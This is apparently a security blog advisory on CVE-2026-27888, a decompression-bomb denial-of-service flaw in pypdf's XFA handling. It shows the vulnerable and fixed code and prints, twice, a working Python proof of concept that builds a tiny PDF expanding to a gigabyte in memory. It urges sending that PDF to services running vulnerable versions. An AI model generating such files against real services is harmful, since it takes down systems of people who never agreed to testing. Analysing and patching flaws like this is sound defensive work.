The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in pypdf/_doc_common.py, specifically in how the library fetches XFA data.

PDFs store XFA forms as streams. To save space, these streams are compressed, usually with FlateDecode (zlib). When you access reader.xfa or writer.xfa, pypdf needs to decompress that stream to give you the XML content.

Here is the logic flaw: The developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python bytes object. There were no guardrails. No checks to ask, "Hey, should this 5KB compressed blob really turn into a 4GB string?"

> [!NOTE] > In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses down to almost nothing. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.

# pypdf/_doc_common.py (Vulnerable) if isinstance(f, IndirectObject): field = cast(Optional[EncodedStreamObject], f.get_object()) if field: # The fatal line: es = zlib.decompress(field._data) retval[tag] = es

# The "I hate your RAM" PoC from pypdf import PdfWriter from pypdf.generic import NameObject, DictionaryObject, EncodedStreamObject, ArrayObject import zlib # 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily) # In a real weaponized script, we'd stream this into the zlib compressor. payload = b'A' * (1024 * 1024 * 1024) # 2. Compress it. This will shrink to a few KB. compressed_data = zlib.compress(payload, level=9) # 3. Build the PDF structure writer = PdfWriter() writer.add_blank_page(width=72, height=72) # Create the stream object stream = EncodedStreamObject() stream._data = compressed_data stream[NameObject("/Filter")] = NameObject("/FlateDecode") # Attach it to the XFA dictionary xfa_array = ArrayObject([stream]) acro_form = DictionaryObject() acro_form[NameObject("/XFA")] = writer._add_object(xfa_array) writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form) # 4. Save the bomb with open("memory_nuke.pdf", "wb") as f: writer.write(f)

Product

Affected Versions

Fixed Version

pypdf

py-pdf

< 6.7.3

6.7.3

Attribute

Detail

CWE ID

CWE-400 (Uncontrolled Resource Consumption)

CVSS v4.0

6.6 (Medium)

Attack Vector

Network / Local

Exploit Status

PoC Available

Impact

Denial of Service (DoS)

Affected Component

pypdf.PdfReader.xfa

CVE-2026-27888

Death by Decompression: Inside the pypdf XFA RAM Exhaustion Exploit

Amit Schendel

Senior Security Researcher

Feb 26, 2026·5 min read·46 visits

Executive Summary (TL;DR)

pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.

A critical resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.

Attack Flow Diagram

The Hook: PDFs are just Zip Bombs in a Trench Coat

If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).

pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.

But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent—maybe 10KB on disk—but when your Python script tries to read its metadata, it suddenly demands 10GB of RAM. The OS panics, the OOM killer wakes up, and your service goes dark. It’s a beautifully simple Denial of Service.

The Flaw: Trusting the Stream

The Code: The Smoking Gun

Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:

# pypdf/_doc_common.py (Vulnerable)
if isinstance(f, IndirectObject):
    field = cast(Optional[EncodedStreamObject], f.get_object())
    if field:
        # The fatal line:
        es = zlib.decompress(field._data)
        retval[tag] = es

See that zlib.decompress(field._data)? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.

Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."

# pypdf/_doc_common.py (Fixed)
from .filters import _decompress_with_limit  # <--- The Savior
 
if field:
    # Safe decompression:
    es = _decompress_with_limit(field._data)
    retval[tag] = es

The _decompress_with_limit function uses zlib.decompressobj to decompress in chunks, tracking the total size and raising a LimitReachedError if it exceeds a predefined threshold (defaulting to a sane limit like 2GB or less, configurable via ZLIB_MAX_OUTPUT_LENGTH).

The Exploit: Building the Bomb

Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.

Here is the recipe for disaster:

Create the Payload: We need a highly compressible stream. A Gigabyte of zeros or 'A's works perfectly.
Compress it: Use zlib with the highest compression level (9).
Inject it: Place this blob into the /XFA array of the PDF's /AcroForm dictionary.

# The "I hate your RAM" PoC
from pypdf import PdfWriter
from pypdf.generic import NameObject, DictionaryObject, EncodedStreamObject, ArrayObject
import zlib
 
# 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
# In a real weaponized script, we'd stream this into the zlib compressor.
payload = b'A' * (1024 * 1024 * 1024) 
 
# 2. Compress it. This will shrink to a few KB.
compressed_data = zlib.compress(payload, level=9)
 
# 3. Build the PDF structure
writer = PdfWriter()
writer.add_blank_page(width=72, height=72)
 
# Create the stream object
stream = EncodedStreamObject()
stream._data = compressed_data
stream[NameObject("/Filter")] = NameObject("/FlateDecode")
 
# Attach it to the XFA dictionary
xfa_array = ArrayObject([stream])
acro_form = DictionaryObject()
acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)
 
# 4. Save the bomb
with open("memory_nuke.pdf", "wb") as f:
    writer.write(f)

Now, send memory_nuke.pdf to any service that uses a vulnerable pypdf to inspect metadata. As soon as they access the xfa property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.

The Impact: Why automation is dangerous

Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.

If your application uses pypdf to check for form fields (reader.get_form_text_fields() often interacts with XFA components internally) or simply tries to extract all metadata for indexing, a single malicious user can take down your worker nodes.

This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.

Official Patches

pypdfRelease notes for version 6.7.3

Fix Analysis (1)

Technical Appendix

CVSS Score

6.6/ 10

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

EPSS Probability

0.04%

Top 87% most exploited

Affected Systems

pypdf < 6.7.3Python applications processing untrusted PDFsRAG pipelines using pypdf for extraction

Affected Versions Detail

Product	Affected Versions	Fixed Version
pypdf py-pdf	< 6.7.3	6.7.3

Attribute	Detail
CWE ID	CWE-400 (Uncontrolled Resource Consumption)
CVSS v4.0	6.6 (Medium)
Attack Vector	Network / Local
Exploit Status	PoC Available
Impact	Denial of Service (DoS)
Affected Component	pypdf.PdfReader.xfa

MITRE ATT&CK Mapping

T1499.004Endpoint Denial of Service: Application Exhaustion

Impact

CWE-400

Uncontrolled Resource Consumption

Known Exploits & Detection

pypdf RepositoryUnit test demonstrating the exhaustion logic

Vulnerability Timeline

Vulnerability identified and Fix merged

2026-02-24

pypdf 6.7.3 Released

2026-02-24

CVE Published

2026-02-26

More Reports

•4 days ago•CVE-2026-9354

6.9

CVE-2026-9354: Arbitrary Mass Mention Bypass in NousResearch hermes-agent Slack and Mattermost Adapters

A vulnerability in the Slack and Mattermost platform adapters for NousResearch hermes-agent permits an unauthenticated remote attacker to execute arbitrary mass mentions. By leveraging prompt injection, an attacker can bypass output sanitization logic and trigger workspace-wide notification exhaustion.

Alon Barad

30 views•6 min read

•4 days ago•CVE-2026-9306

6.3

CVE-2026-9306: Unauthenticated Insecure Direct Object Reference (IDOR) in QuantumNous new-api Midjourney Relay

CVE-2026-9306 is a critical unauthenticated Insecure Direct Object Reference (IDOR) vulnerability located in the QuantumNous new-api application, affecting versions up to and including 0.12.1. The flaw is caused by improper middleware ordering combined with a lack of object-level authorization checks. This allows remote, unauthenticated attackers to retrieve sensitive Midjourney images belonging to other users by supplying a valid task identifier.

Amit Schendel

13 views•5 min read

•5 days ago•GHSA-GGXF-37HM-9WQF

6.5

GHSA-GGXF-37HM-9WQF: Session Leakage via Unsafe Challenge Path Parsing in instagrapi

The instagrapi library prior to version 2.6.9 contains an improper input validation vulnerability within its challenge handling mechanism. Maliciously crafted server responses can manipulate the client into forwarding session cookies and credentials to an external attacker-controlled domain.

Amit Schendel

20 views•6 min read

•5 days ago•GHSA-QQQM-5547-774X

9.1

GHSA-QQQM-5547-774X: Unauthenticated Path Traversal in FileBrowser Quantum PATCH Handler

GHSA-QQQM-5547-774X is a critical path traversal vulnerability in the FileBrowser Quantum application, specifically within the Go backend package. The vulnerability resides in the HTTP handler responsible for processing bulk file modifications via the public API. Unauthenticated attackers can exploit an order-of-operations flaw in the path sanitization logic to bypass intended directory restrictions. This allows adversaries to arbitrarily read, move, and overwrite files on the underlying filesystem by supplying specially crafted HTTP PATCH requests.

Alon Barad

5 views•6 min read

•5 days ago•CVE-2026-8723

5.3

CVE-2026-8723: Synchronous Denial of Service in qs npm Package via TypeError

The qs query string parsing and serialization library for Node.js is vulnerable to a synchronous Denial of Service (DoS) attack. The vulnerability manifests as a process-terminating TypeError when processing arrays with null or undefined elements under specific configuration parameters.

Amit Schendel

35 views•7 min read

•5 days ago•GHSA-7M8F-HGJQ-8GC9

7.5

GHSA-7M8F-HGJQ-8GC9: Pre-Authentication Denial of Service via Insecure Deserialization Order in aiosend

The aiosend library prior to version 3.0.6 contains a pre-authentication Denial of Service (DoS) vulnerability in its webhook handling mechanism. The software processes and deserializes incoming JSON payloads before verifying the cryptographic signature, allowing unauthenticated attackers to exhaust server CPU and memory resources by sending large, complex payloads.

Amit Schendel

3 views•6 min read